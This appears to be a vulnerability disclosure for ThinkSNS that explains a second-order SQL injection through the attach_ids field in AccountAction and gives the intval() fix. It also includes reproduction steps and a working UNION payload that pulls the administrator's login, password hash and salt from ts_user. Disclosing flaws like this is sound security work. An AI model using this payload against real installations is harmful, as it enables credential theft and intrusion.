<ul><li>/apps/public/Lib/Action/AccountAction.class.php</li></ul><pre class="">public function doAuthenticate(){
    $verifyInfo = D('user_verified')->where('uid='.$this->mid)->find();
    $data['usergroup_id'] = intval($_POST['usergroup_id']);
    if(!$data['usergroup_id']) $data['usergroup_id'] = 5;
    ……
    //$data['info'] = t($_POST['info']);
    $data['attach_id'] = t($_POST['attach_ids']);   // only t(), no intval(): stored as an arbitrary string
    if(D('user_verified_category')->where('pid='.$data['usergroup_id'])->find()){
        $data['user_verified_category_id'] = intval($_POST['verifiedCategory']);
    }else{
        $data['user_verified_category_id'] = 0;
    }
    ……
    if($verifyInfo){
        $data['verified'] = 0;
        $res = D('user_verified')->where('uid='.$verifyInfo['uid'])->save($data);
    }else{
        $data['uid'] = $this->mid;
        $res = D('user_verified')->add($data);
    }
    ……
}
</pre><p>The POST field <code>attach_ids</code> is written to <code>user_verified.attach_id</code> after passing only through <code>t()</code>; unlike <code>usergroup_id</code> and <code>verifiedCategory</code>, it is never cast with <code>intval()</code>, so any string the user submits is stored.</p><pre class="">public function authenticate(){
    $auType = model('UserGroup')->where('is_authenticate=1')->findall();
    $this->assign('auType', $auType);
    $verifyInfo = D('user_verified')->where('uid='.$this->mid)->find();
    if($verifyInfo['attach_id']){
        $a = explode('|', $verifyInfo['attach_id']);
        foreach($a as $key=>$val){
            if($val !== ""){
                // $a[$key] is a piece of the stored string, interpolated straight into where(): second-order injection point
                $verifyInfo['attachment'] .= D('attach')->where("attach_id=$a[$key]")->getField('name').'&nbsp;<a href="'.U('widget/Upload/down',array('attach_id'=>$a[$key])).'" target="_blank">下载</a><br />';
            }
        }
    }
    ……
}
</pre><p>When the page is rendered, the stored <code>attach_id</code> is split on <code>|</code> and each piece is concatenated into the <code>where()</code> clause of a query against the <code>attach</code> table. Because <code>attach_ids</code> is attacker-controlled at write time, as shown above, this is a second-order SQL injection: the payload is stored on one request and executed on a later one. The fix is to cast every piece with <code>intval()</code> (either before it is stored or before it is placed in the query) so that only integers can reach the SQL string.</p><p>Register an account, log in, and visit:</p><pre class="">http://10.211.55.12/thinksns/index.php?app=public&mod=Account&act=Authenticate</pre><p>Fill in the required fields, upload any image, and change <code>attach_ids</code> to the following (77 is the <code>attach_id</code> assigned to the uploaded image in this run; the payload uses the hex literals <code>0x23</code> and <code>0x3a</code> for <code>#</code> and <code>:</code> so that no quote characters are needed, and the trailing <code>#</code> comments out the rest of the generated query):</p><pre class="">|77|-1 union select concat(login,0x23,password,0x3a,login_salt) from ts_user limit 1#</pre><p><img alt="2CCA9FB7-2B39-4037-98B8-741B5E776EAC.png" src="https://images.seebug.org/@/uploads/1434093460362-2CCA9FB7-2B39-4037-98B8-741B5E776EAC.png" data-image-size="821,662"><br></p><p>Click submit, then visit the URL above again: the first row of <code>ts_user</code>, the administrator's login, password hash and <code>login_salt</code>, is rendered in place of an attachment name:</p><p><img alt="3A396FFB-FD9C-44EC-B411-8AF9ADD7726A.png" src="https://images.seebug.org/@/uploads/1434093481265-3A396FFB-FD9C-44EC-B411-8AF9ADD7726A.png" data-image-size="720,201"><br></p>